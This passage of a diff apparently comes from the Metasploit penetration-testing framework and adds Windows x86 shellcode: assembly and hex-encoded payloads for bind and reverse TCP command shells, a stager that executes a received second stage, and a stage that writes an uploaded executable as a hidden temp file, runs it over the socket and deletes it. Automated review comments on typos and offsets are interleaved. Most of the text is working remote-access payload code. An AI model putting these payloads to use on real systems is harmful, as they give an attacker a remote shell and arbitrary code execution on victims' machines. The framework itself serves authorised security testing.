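+                scan( argv[2], argv[3], print_hashes=True )
+            else:
+                hash( argv[1], argv[2] )
+    except Exception, e:
+        print "[-] ", e
+#=============================================================================#
+if __name__ == "__main__":
+    main()
+#=============================================================================#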
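--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_exec.asm
@@ -0,0 +1,26 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 191 bytes + strlen(command) + 1
+; Build: >build.py single_exec
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+cld ; Clear the direction flag.
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm" ;
+start: ;
+pop ebp ; Pop off the address of 'api_call' for calling later.
+push byte +1 ;
+lea eax, [ebp+command-delta]
+push eax ;
+push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" )
+call ebp ; WinExec( &command, 1 );
+; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"
+command:
+;db "calc.exe", 0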
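Review bot: The `command:` label at the end of the blob has no data behind it (the `db "calc.exe", 0` line is commented out), while the header's Size line counts `strlen(command) + 1`, so a reader of this file alone cannot tell where the command string comes from or who NUL-terminates it. A comment on the label would close that gap, e.g. `command: ; the NUL-terminated command string is appended here at generation time`; presumably the Ruby exec payload module does that, but nothing in this file shows it. The Size line depends on the same convention, so the two comments should be kept in step.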
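--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 341 bytes
+; Build: >build.py single_shell_bind_tcp
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+cld ; Clear the direction flag.
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+pop ebp ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_bind_tcp.asm"
+; By here we will have performed the bind_tcp connection and EDI will be out socket.
+%include "./src/block/block_shell.asm"
+; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"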
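Review bot: The comment after the bind_tcp include reads `EDI will be out socket`; it should be `our socket`, as the matching line in stager_bind_tcp_nx.asm already has it. The same typo appears in single_shell_reverse_tcp.asm after its reverse_tcp include. The corrected line is `; By here we will have performed the bind_tcp connection and EDI will be our socket.`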
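--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 314 bytes
+; Build: >build.py single_shell_reverse_tcp
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+cld ; Clear the direction flag.
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+pop ebp ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_tcp.asm"
+; By here we will have performed the reverse_tcp connection and EDI will be out socket.
+%include "./src/block/block_shell.asm"
+; Finish up with the EXITFUNK.
+%include "./src/block/block_exitfunk.asm"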
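--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stage/stage_shell.asm
@@ -0,0 +1,22 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 240 bytes
+; Build: >build.py stage_shell
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
+; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
+; if the old stage 1 location gets munged.
+
+cld ; Clear the direction flag.
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+pop ebp ; Pop off the address of 'api_call' for calling later.
+%include "./src/block/block_shell.asm"
+; Perform the call to our EXITFUNC.
+%include "./src/block/block_exitfunk.asm"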
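--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stage/stage_upexec.asm
@@ -0,0 +1,137 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 398 bytes
+; Build: >build.py stage_upexec
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
+; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
+; if the old stage 1 location gets munged.
+
+cld ; Clear the direction flag.
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm"
+start: ;
+pop ebp ; Pop off the address of 'api_call' for calling later.
+; create a file in a temp dir...
+push byte 127 ; Push down 127
+pop eax ; And pop it into EAX
+shl eax, 3 ; Shift EAX left by 3 so it = 1016
+sub esp, eax ; Alloc this space on the stack for the temp file path + name
+push esp ; Push the buffer address
+push eax ; Push the buffer size (127 * 4 = 508)
+push 0xE449F330 ; hash( "kernel32.dll", "GetTempPathA" )
+call ebp ; GetTempPathA( 1016, &buffer );
+lea eax, [esp+eax] ; EAX = pointer to the end of the temp path buffer (ESP point to the full path)
+mov dword [eax+0], 0x2E637673 ; Append the file name...
+mov dword [eax+4], 0x00657865 ; 'svc.exe',0
+; Create the file...
+mov eax, esp ; to save a few bytes, pace the file path pointer in EAX
+push eax ; save the pointer to the file path for later
+push byte 0 ; We dont specify a template file handle
+push byte 6 ; The Flags and Attributes: FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
+push byte 2 ; The Creation Disposition: CREATE_ALWAYS
+push byte 0 ; We dont specify a SECURITY_ATTRIBUTES structure
+push byte 7 ; The Share Mode: FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE
+push 0xE0000000 ; The Desired Access: GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE
+push eax ; The name of the file to create
+push 0x4FDAF6DA ; hash( "kernel32.dll", "CreateFileA" )
+call ebp ; CreateFileA( ... );
+mov ebx, eax ; EBX = the new file handle
+; Receive the size of the incoming file...
+push esp ; Alloc a dword for the recv buffer param
+mov esi, esp ; Save pointer
+push byte 0 ; Flags
+push byte 4 ; Length = sizeof( DWORD );
+push esi ; The 4 byte buffer on the stack to hold the second stage length
+push edi ; The saved socket
+push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+call ebp ; recv( s, &dwLength, 4, 0 );
+; Alloc a RW buffer for the incoming file...
+mov esi, [esi] ; Dereference the pointer to the second stage length
+push byte 0x04 ; PAGE_READWRITE
+push 0x1000 ; MEM_COMMIT
+push esi ; Push the newly recieved second stage length.
+push byte 0 ; NULL as we dont care where the allocation is.
+push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_READWRITE );
+push ebx ; Save the file handle for later call to CloseHandle
+; setup the parameters for subsequent call to WriteFile (saves us trying to preserve various registers)
+push ebx ; Alloc a dword for the bytes written param
+mov ecx, esp ; Save this address
+push byte 0 ; null as we dont set an overlapped param
+push ecx ; Pointer to the number of bytes written output param
+push esi ; Push the buffer length
+push eax ; Push the newly allocated RW buffer
+push ebx ; Push the hFile param
+mov ebx, eax ; EBX = our new memory address for the incoming file
+; read in the incoming file...
+read_more: ;
+push byte 0 ; Flags
+push esi ; Length
+push ebx ; The current address into our incoming files RW buffer
+push edi ; The saved socket
+push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+call ebp ; recv( s, buffer, length, 0 );
+add ebx, eax ; buffer += bytes_received
+sub esi, eax ; length -= bytes_received
+test esi, esi ; Test length
+jnz read_more ; Continue if we have more to read
+; write the entire files buffer to disk...
+push 0x5BAE572D ; hash( "kernel32.dll", "WriteFile" )
+call ebp ; WriteFile( hFile, pBuffer, len, &out, 0 );
+pop ecx ; Restore esp to the correct location for the next call
+; close the file handle, we dont need to push the handle as it is allready pushed onto stack
+push 0x528796C6 ; hash( "kernel32.dll", "CloseHandle" )
+call ebp ; CloseHandle( hFile );
+; execute the file...
+push edi ; Our socket becomes the processes hStdError
+push edi ; Our socket becomes the processes hStdOutput
+push edi ; Our socket becomes the processes hStdInput
+xor esi, esi ; Clear ESI for all the NULL's we need to push
+push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
+pop ecx ; Set ECX for the loop
+push_loop2: ;
+push esi ; Push a null dword
+loop push_loop2 ; Keep looping untill we have pushed enough nulls
+mov word [esp+60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+lea eax, [esp+16] ; Set EAX as a pointer to our STARTUPINFO Structure
+mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
+; perform the call to CreateProcessA
+push esp ; Push the pointer to the PROCESS_INFORMATION Structure
+push eax ; Push the pointer to the STARTUPINFO Structure
+push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+push esi ; We dont specify any dwCreationFlags
+inc esi ; Increment ESI to be one
+push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+dec esi ; Decrement ESI back down to zero
+push esi ; Set lpThreadAttributes to NULL
+push esi ; Set lpProcessAttributes to NULL
+push dword [esp+120] ; Set the lpCommandLine to run the file (Use the saved pointer to the file path)
+push esi ; Set lpApplicationName to NULL as we are using the command line param instead
+push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
+call ebp ; CreateProcessA( 0, &file, 0, 0, TRUE, 0, 0, 0, &si, &pi );
+; perform the call to WaitForSingleObject
+mov eax, esp ; Save pointer to the PROCESS_INFORMATION Structure
+dec esi ; Decrement ESI down to -1 (INFINITE)
+push esi ; Push INFINITE inorder to wait forever
+inc esi ; Increment ESI back to zero
+push dword [eax] ; Push the handle from our PROCESS_INFORMATION.hProcess
+push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
+call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
+; close the socket...
+push edi ; Push the socket to close
+push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
+call ebp ; closesocket( s );
+; delete the file...
+push dword [esp+88] ; Push the saved pointer to the file path
+push 0x13DD2ED7 ; hash( "kernel32.dll", "DeleteFileA" )
+call ebp ; DeleteFileA( &file );
+; finish up with the EXITFUNK
+%include "./src/block/block_exitfunk.asm"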
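Review bot: The comments describing the temp-path buffer size contradict each other: `shl eax, 3` is annotated `so it = 1016`, the `push eax` that passes the same value to GetTempPathA is annotated `(127 * 4 = 508)`, and the call comment then reads `GetTempPathA( 1016, &buffer )`. Since 127 << 3 is 1016, the push comment is the wrong one; `push eax ; Push the buffer size (127 << 3 = 1016)` keeps the three in step. In the same block, `to save a few bytes, pace the file path pointer in EAX` should read `place`.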
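--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stager/stager_bind_tcp_nx.asm
@@ -0,0 +1,19 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 301 bytes
+; Build: >build.py stager_bind_tcp_nx
+;-----------------------------------------------------------------------------;
+[BITS 32]
+[ORG 0]
+
+cld ; Clear the direction flag.
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+pop ebp ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_bind_tcp.asm"
+; By here we will have performed the bind_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv.asm"
+; By now we will have recieved in the second stage into a RWX buffer and be executing it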
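--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 274 bytes
+; Build: >build.py stager_reverse_tcp_nx
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+cld ; Clear the direction flag.
+call start ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start: ;
+pop ebp ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_reverse_tcp.asm"
+; By here we will have performed the reverse_tcp connection and EDI will be our socket.
+%include "./src/block/block_recv.asm"
+; By now we will have recieved in the second stage into a RWX buffer and be executing it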
@ -15,9 +15,9 @@ module Msf::Payload::Windows
|
||||
#
|
||||
@@exit_types =
|
||||
{
|
||||
'seh' => 0x5f048af0, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x60e0ceef, # ExitThread
|
||||
'process' => 0x73e2d87e, # ExitProcess
|
||||
'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter
|
||||
'thread' => 0x0A2A1DE0, # ExitThread
|
||||
'process' => 0x56A2B5F0, # ExitProcess
|
||||
}
|
||||
|
||||
#
|
||||
@ -64,6 +64,13 @@ module Msf::Payload::Windows
|
||||
# ensure that the entire stage is read in.
|
||||
#
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
||||
if( self.module_info['Stager']['RequiresMidstager'] == false )
|
||||
conn.put( [ payload.length ].pack('V') )
|
||||
# returning false allows stager.rb!handle_connection() to prepend the stage_prefix if needed
|
||||
return false
|
||||
end
|
||||
|
||||
return false if (payload.length < 512)
|
||||
|
||||
# The mid-stage works by reading in a four byte length in host-byte
|
||||
|
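Review bot: `self.module_info['Stager']['RequiresMidstager'] == false` is a deliberate tri-state test — only an explicit `false` skips the midstage, while a stager that omits the key (nil) keeps the previous behaviour — but nothing in the hunk says so, and the obvious "simplification" to `unless self.module_info['Stager']['RequiresMidstager']` would silently change every stager that does not set the key. A comment above the `if`, e.g. `# Only an explicit false opts out of the midstage; stagers that omit the key still get it`, would protect that intent. It is also worth noting in the same comment that the 4-byte little-endian length written by `conn.put` is the prefix the new block_recv-based stagers appear to read first, so the two must stay in step. The method's body continues outside the hunk.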
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
@ -5,6 +9,7 @@ module Msf
|
||||
# Common command execution implementation for Windows.
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::Exec
|
||||
|
||||
include Msf::Payload::Windows
|
||||
@ -15,7 +20,7 @@ module Payload::Windows::Exec
|
||||
'Name' => 'Windows Execute Command',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Execute an arbitrary command',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -23,16 +28,20 @@ module Payload::Windows::Exec
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 100, 'V' ]
|
||||
'EXITFUNC' => [ 161, 'V' ]
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" +
|
||||
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04" +
|
||||
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64" +
|
||||
"\x8b\x46\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83" +
|
||||
"\xc0\x6a\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7"
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x6A\x01\x8D\x85\xB9\x00\x00\x00\x50\x68\x31\x8B\x6F\x87\xFF\xD5" +
|
||||
"\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06\x7C\x0A" +
|
||||
"\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
|
||||
|
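Review bot: `'EXITFUNC' => [ 161, 'V' ]` is a hand-computed byte offset into an opaque blob, and the hunk gives no way to re-derive it when the blob is rebuilt; the value does line up with the `\xBB` (`mov ebx, imm32`) at byte 160 of the new bytes, but whoever next regenerates this from `src/single/single_exec.asm` has to recount by hand. A comment beside the offset naming its origin, e.g. `# imm32 of the 'mov ebx' that loads the exit-function hash; regenerate with build.py single_exec`, makes the coupling explicit (which include emits that instruction is not visible here). The Offsets hash sits inside a Payload hash that starts and ends outside the hunk.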
@ -82,7 +82,7 @@ module Payload::Windows::ReflectiveDllInject
|
||||
"\x68\x04\x00\x00\x00" + # push 0x4 ; signal we have attached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD0" + # call eax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
|
||||
"\x68\xDE\xC0\xAD\xDE" + # push 0xDEADC0DE ; our EXITFUNC placeholder
|
||||
"\x68\xE0\x1D\x2A\x0A" + # push 0x0A2A1DE0 ; our EXITFUNC placeholder (Default to ExitThread for migration)
|
||||
"\x68\x05\x00\x00\x00" + # push 0x5 ; signal we have detached
|
||||
"\x50" + # push eax ; some value for hinstance
|
||||
"\xFF\xD3" # call ebx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
|
||||
|
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Command Shell, Bind TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Listen for a connection and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -34,38 +34,31 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 162, 'n' ],
|
||||
'EXITFUNC' => [ 308, 'V' ],
|
||||
'LPORT' => [ 201, 'n' ],
|
||||
'EXITFUNC' => [ 311, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53" +
|
||||
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1" +
|
||||
"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51" +
|
||||
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" +
|
||||
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50" +
|
||||
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57" +
|
||||
"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d" +
|
||||
"\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" +
|
||||
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93" +
|
||||
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff" +
|
||||
"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01" +
|
||||
"\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" +
|
||||
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83" +
|
||||
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73" +
|
||||
"\x53\xff\xd6\xff\xd0"
|
||||
|
||||
'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
|
||||
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
|
||||
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
|
||||
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
|
||||
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
|
||||
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
|
||||
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" +
|
||||
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" +
|
||||
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" +
|
||||
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" +
|
||||
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" +
|
||||
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" +
|
||||
"\x6A\x00\x53\xFF\xD5"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
@ -77,5 +77,18 @@ module Metasploit3
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
# for now we must let this payload use the old EXITFUNC hash values.
|
||||
def replace_var(raw, name, offset, pack)
|
||||
super
|
||||
if( name == 'EXITFUNC' )
|
||||
datastore[name] = 'thread' if not datastore[name]
|
||||
raw[offset, 4] = [ 0x5F048AF0 ].pack(pack || 'V') if datastore[name] == 'seh'
|
||||
raw[offset, 4] = [ 0x60E0CEEF ].pack(pack || 'V') if datastore[name] == 'thread'
|
||||
raw[offset, 4] = [ 0x73E2D87E ].pack(pack || 'V') if datastore[name] == 'process'
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
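Review bot: The override discards `super`'s return value and then answers `false` for every name other than EXITFUNC, so if the parent reports having handled a variable the caller is told the opposite and may apply its default substitution on top; `return super unless name == 'EXITFUNC'` at the top of the method would preserve the parent's answer (what super returns is not visible here, so this is inferred from the true/false protocol the override itself follows). The identical override, with the same three constants, is pasted again in the `@ -100,5 +100,18 @@` hunk further down the page, and the hunk header line numbers show both are in files other than the payload hunks printed just above them. Lifting the constants into one shared table with a comment naming them as the pre-overhaul SetUnhandledExceptionFilter/ExitThread/ExitProcess hashes from `@@exit_types` would keep the two copies from drifting. Assigning `datastore[name] = 'thread'` inside replace_var also mutates the datastore as a side effect of generation, which deserves a comment if intentional.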
@ -24,7 +24,7 @@ module Metasploit3
|
||||
'Name' => 'Windows Command Shell, Reverse TCP Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Connect back to attacker and spawn a command shell',
|
||||
'Author' => 'vlad902',
|
||||
'Author' => [ 'vlad902', 'Stephen Fewer <stephen_fewer[at]harmonysecurity[dot]com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
@ -34,36 +34,30 @@ module Metasploit3
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 166, 'n' ],
|
||||
'LHOST' => [ 160, 'ADDR' ],
|
||||
'EXITFUNC' => [ 278, 'V' ],
|
||||
'LPORT' => [ 203, 'n' ],
|
||||
'LHOST' => [ 196, 'ADDR' ],
|
||||
'EXITFUNC' => [ 284, 'V' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c" +
|
||||
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" +
|
||||
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
|
||||
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" +
|
||||
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f" +
|
||||
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb" +
|
||||
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" +
|
||||
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" +
|
||||
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53" +
|
||||
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0" +
|
||||
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66" +
|
||||
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" +
|
||||
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43" +
|
||||
"\x53\xff\xd0\x68\xff\xff\xff\xff\x66\x68\x11\x5c" +
|
||||
